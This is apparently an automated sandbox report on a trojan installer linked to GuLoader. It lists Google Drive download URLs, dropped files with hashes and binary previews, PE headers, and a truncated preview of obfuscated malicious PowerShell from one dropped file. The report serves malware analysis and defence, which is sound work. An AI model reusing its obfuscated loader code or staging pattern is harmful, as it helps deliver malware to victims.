00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/h	msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/2	msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/jd	msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/ificate	msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.1	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
172.217.19.174	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567521
Start date and time:	2024-12-03 16:41:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AwMu7gR48D.exe renamed because original name is a hash value
Original Sample Name:	6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/14@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 94% Number of executed functions: 67 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6076 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
VT rate limit hit for: AwMu7gR48D.exe

Simulations

Behavior and APIs

Time	Type	Description
10:43:01	API Interceptor	40x Sleep call for process: powershell.exe modified
10:43:51	API Interceptor	13x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	NX6BOqyG3J.exe	Get hash	malicious	GuLoader	Browse	142.250.181.1 172.217.19.174
	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse	142.250.181.1 172.217.19.174
	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.1 172.217.19.174
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.181.1 172.217.19.174
	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.1 172.217.19.174
	REQUEST FOR QUOATION AND PRICES.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.1 172.217.19.174
	IBAN payment confirmation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.1 172.217.19.174
	yMvZXcwN2OdoP6x.exe	Get hash	malicious	DarkCloud	Browse	142.250.181.1 172.217.19.174
	Curri.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	36244920cQPUT1.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecynsohp.vif.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foylndte.2fi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0vyifxw.x1t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0yrrhwl.eyn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.6614996787412575
Encrypted:	false
SSDEEP:	48:qYGZ0Gtq/oaPybCQ1hsIqXA1AfsgsfbLwGXwaEvRugYy/ImBmrm:wDAoyXAykgEUGAaGRuRm
MD5:	245AC30568C8703531FC4E64B321BE16
SHA1:	BADD01A31FC2B8CC050A1DC3489FC8F620C450F7
SHA-256:	B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
SHA-512:	9A81F2DE2CC41F6E35498B04B6327ADCFF268523F7B6A9EA9D5CFA1B2CF0425E59A121C99F0A0251C3380886CC058E88DE8A12B17E049D5FD5D7EEB0C956F083
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: beNxougDFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.............................. ......0#......Rich............................PE..L.....uY...........!......................... ...............................P......................................."..h...l ..<............................@....................................................... ..l............................text...g........................... ..`.rdata..(.... ......................@..@.data...<....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.286321681873388
Encrypted:	false
SSDEEP:	48:qK64n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSC15gaoFU:5P4ZxKQruHkJwvcVyV4FU
MD5:	200E4D67E7A08D4C92F05E31442095FE
SHA1:	1D0492FDFB7C0C8799AEA7982DA8B4EFEDE7581B
SHA-256:	01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
SHA-512:	620AB7A94E4EE965C159CC1A5F2ADC2CC6616CFB738EA191EAB404B249D21DD19134A314A21315F4EE2C0A75FD5062D1BF353BB75B877A61171F27F4A87CF995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: beNxougDFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....uY...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	500524
Entropy (8bit):	7.632562248014631
Encrypted:	false
SSDEEP:	12288:SpC1NSIUW2qjUT8IiMGQb7jYF+Xg0x1Odt3xD:eC1UabQb2+XPMV
MD5:	E910DD39A106DFB09F31945608899357
SHA1:	3C769E1093522DAF75C7425413A5D44DD3F29F7F
SHA-256:	6F4ACFDBAC861233F66AFA46E67B349354826D039A367314F28F13FD7BFA5287
SHA-512:	EE160A5DF59B154AD96DCF11862098A09D0502C8C7C78DF2484A3CBD93DA21C9A2EA4A79DA3800AC38544B3217889F55D877CC70B86F71B43E87C9DCE9125170
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L...#.uY.................`...........1.......p....@.......................................@.................................(t.......0...W...........................................................................p...............................text....^.......`.................. ..`.rdata..H....p.......d..............@..@.data................x..............@....ndata.......@...........................rsrc....W...0...X...\|..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\unshabbily\Hardwire\dicyclopentadienyliron.skr

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	data
Category:	dropped
Size (bytes):	134563
Entropy (8bit):	1.2420304589895552
Encrypted:	false
SSDEEP:	768:JTXI/LYa4cD2ujQzIsqIoMEJ8owrALEXMFrDwh0aHlC++KDTvfO/Ky:EnVS+r9brkwN/
MD5:	E6066CC79780E021C55CDC3EF8FC82CC
SHA1:	FADDF02F672BEA8C3A766FB42F1FDC365934ED50
SHA-256:	ED56062F4EA903C040602E4F50BB0F88A5E5DAC8F9F50A608D0495347C1003B8
SHA-512:	1F856CE5664BA5BC3914ACE73BDF0F0EBD419A5162890F9E7F66A9878DA9ACDDE9E24A42DDCE4ADAC7014F41F4C54977D9754DC867A9570B6A7BCAB757FC53F7
Malicious:	false
Preview:	...................................~.................j.....................................................q-....................................................................M................n..O%....H............................4..=......................z..................j.............................................'..............T.M..............!.................................................................................x.....................{..............R..............................................&..........h..............0...............................................................D...................................................................................................................................(..........................................................................E...........`.....=......................n.............................!...g................................#.........................................................................

C:\Users\user\AppData\Local\unshabbily\Hardwire\fjernkontrollers.hid

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	data
Category:	dropped
Size (bytes):	347357
Entropy (8bit):	1.2510537828861161
Encrypted:	false
SSDEEP:	768:7wNmQThgiCB7GJHZUFVJPaSenNvSIpJjRuermO9c3NMRzgJrawa1+VWzoIk33SnI:Agcs7GTR7EvgE
MD5:	10C53FA2ADD5E04A7C257241470F8B30
SHA1:	F280F7414C749DA2A84EAC4DF1AD18B623325CF8
SHA-256:	E27733521BB45F4719C1FFFB5D0D9262E8BAA510C52E7EC880612464E5889685
SHA-512:	CF23EA9FB2316C67A1AAA7DCEFD48728F9DBC17E2413867EBFEB443F2EE7CF0BCFCF00F2FAF094A56779FEAE27D14E7408D629E0DF4EF7A8D2CF4FAFA1EBF2D0
Malicious:	false
Preview:	.........[......*....................................................`..........x.......................................#......A..........................................t....................&.....................y...............................................................................................................................h...............K.........................................................................s......................S.........................n.....`...................................................................................J..a.............;.........................x.....................e.........6.....................?.......................................................U.....c.......................A...........................................................\|..............................................=............................L...........p..f.......]..................E................................................................v...

C:\Users\user\AppData\Local\unshabbily\Hardwire\irresolubleness.hje

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 164
Category:	dropped
Size (bytes):	4242
Entropy (8bit):	1.1689000520156396
Encrypted:	false
SSDEEP:	24:3X9EQjC0f2xlR8XA8f+6mqZVN//sTqYiegGDXMTTO1zlvyQ:nbpexne/+UfNXsNiSCTOPvh
MD5:	7F09DBB1E7A421C1C43B98C594A1F1EE
SHA1:	5E541763EFD79D7005668B908BE438412E042CBD
SHA-256:	20F7314F0A64579C20FFBAC8DE67F9D36FD4824F5C64DC01D89F5FF4908BCDC5
SHA-512:	B901933CD173EDC42828FCC6CCA5B4A4BC29FD0F0ADD0AE08BE56BBF1D24781C542C8CE99142069287C976F6E8059D5ACD95FEA8D54427D9B02F74765352AAF5
Malicious:	false
Preview:	.......................%............................................................U............W......Z.............;.................Q...........................s.......................................E.............................................z...............................M..........P...................................<........u.............................w................c.........................................I...................................k........?................................}.................$..................'..=2.......G..h...?.....................................................................\|................................................ ............hj..............................................-............+...................................R....h.........................._.!....R........................".................................Q&<...............................J........N.......................................d..........................5

C:\Users\user\AppData\Local\unshabbily\Hitliste.kak

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	data
Category:	dropped
Size (bytes):	300506
Entropy (8bit):	7.692220351018027
Encrypted:	false
SSDEEP:	6144:zZvgBKxTIdbvFjs3a9xjEKBfFMGUpDLVYdXpzDLzwJbv:1MyIdbvFjAaZd4pdYd5rEz
MD5:	A7D0573E705AE64868B5ED90C1F98F36
SHA1:	B472C3F5005EADB55EBA9E94E3D9304FB52A4E55
SHA-256:	0E2EC7016374868C6E0106E93E6F11F1B3760D1960C4C64BF1F247149B529B11
SHA-512:	F466FCC96FFF33E5B857FB1C52FABEA4A83A153E2CC1CEC66F5EBCA8C0E4E61C5F996B162A803BC9AB11BEA376A0B80E99479C19AC83F797339E1458C345EB13
Malicious:	false
Preview:	.............QQQQ.....'.`.............e..y...........DDDD..{{{.XXXX....\|\|...q......PP............aaa.....9..F..................'.....EEEEE.........u.....q...,,,........................."".........YY..............fff.................s..........yyyy..II.....................Q..........\.................\...................../....................m....xxx.""...........//.VV..,.............T....................4.----.....a..........{{{.................c............................................................................b..OO...gggg..........v...........))...........................#........................s.9..............H.......J._______............y...............................~..:...b...A...............3........P.......ttttttt.....22....##.......u......<<.................................BBB.......C....$$$..........C..........???.....n.bbbb...".........K...........HH.................,.QQQQ.EE.. .....................x.}....bbbbb.......................#...... ..aaaa..............

C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan

Download File

Process:	C:\Users\user\Desktop\AwMu7gR48D.exe
File Type:	ASCII text, with very long lines (3197), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	54203
Entropy (8bit):	5.360158731620854
Encrypted:	false
SSDEEP:	1536:425QJQG/9WajWVxaSroT6LaGfmTjGvS+PSkk50:42SJQGFWajUEIoTKuTjGvSCSkk50
MD5:	FD7918A6EE70CC9B6203E20A28EFBBFB
SHA1:	91DB810F8FF57349AFF7FED57D18801167726590
SHA-256:	041651F5B0B965C2F827E167954F7FA689270887D3E13E79D9C13EAEE9E6857D
SHA-512:	C5B0A146BB814259385DFC6DE10E76ED4819D041F568E5E40369CC281039B19BA6DC32A480E353F819BAFB488481F8EC7D50D38EB4F418FC113E60ECBC136B9D
Malicious:	true
Preview:	$Cathja=$tvangssituationernes;..<#Gurgulio Flotillernes Autocollimate Stiklingeformering Combatant Rhabdomancy #>..<#Countereffects Elskelig Tereus Laguners Calyptraea Untholeably Hjemmelsret #>..<#Elfrede Unapplicative Capsuliferous Fadderens Togaers Goys #>..<#Oprundet overstterteoriens Strumming Gavnedes #>..<#Gynaeolatry falkehjerte Provivisection Kollektivets Proscind Klavern #>..<#Pyralidoidea Praxeology Tionontati Midsommerfesternes Affindelsessummernes Pentecostalism #>...$Corpuscules = @'.A ces.Teltp$BegedMOr,eny BalasNatu obicosgSemityTutornTreaci ikks St nmHa,vt= Prop$BevisMConstoPaabebAftvisCorne;Kronp.DenunfNeighuApplinGroomc SmedtDi.hyi morpoS illnRethi KoloT PalmaPrecae WorkmRegnemTrawleli ent Peno Sadd(Lrerf$BetjeT Br grGenneeHousetFakt tBlyine,oncenBal,iaAdrenaForklrpeastsAfbrndSub eabornegTroph,Vandr$PesteG SobeeBellen Ba.bnMo soe Ud,amRebreb edyeaOverogBitnittran eUagts) Viki Th.b{Inde..Korru.Sndag$F,ibrUP,nnynuoverfPivs aStolpitid,slAtriuiengron CortgGlyphnBj.ge

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.632562248014631
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AwMu7gR48D.exe
File size:	500'524 bytes
MD5:	e910dd39a106dfb09f31945608899357
SHA1:	3c769e1093522daf75c7425413a5d44dd3f29f7f
SHA256:	6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287
SHA512:	ee160a5df59b154ad96dcf11862098a09d0502c8c7c78df2484a3cbd93da21c9a2ea4a79da3800ac38544b3217889f55d877cc70b86f71b43e87c9dce9125170
SSDEEP:	12288:SpC1NSIUW2qjUT8IiMGQb7jYF+Xg0x1Odt3xD:eC1UabQb2+XPMV
TLSH:	D9B40261BA50E4D6C83B46B576B3DC3129143DAB837251BF27A837EE5062273050BDAF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...#.uY.................`.........

File Icon


Icon Hash:	246445471b4f0f1f

Static PE Info

General

Entrypoint:	0x4031bb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759523 [Mon Jul 24 06:35:15 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007F2D450B35A3h
push ebx
call 00007F2D450B665Ah
cmp eax, ebx
je 00007F2D450B3599h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F2D450B65D6h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F2D450B357Dh
push 0000000Ah
call 00007F2D450B662Eh
push 00000008h
call 00007F2D450B6627h
push 00000006h
mov dword ptr [00423704h], eax
call 00007F2D450B661Bh
cmp eax, ebx
je 00007F2D450B35A1h
push 0000001Eh
call eax
test eax, eax
je 00007F2D450B3599h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33000	0x15788	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
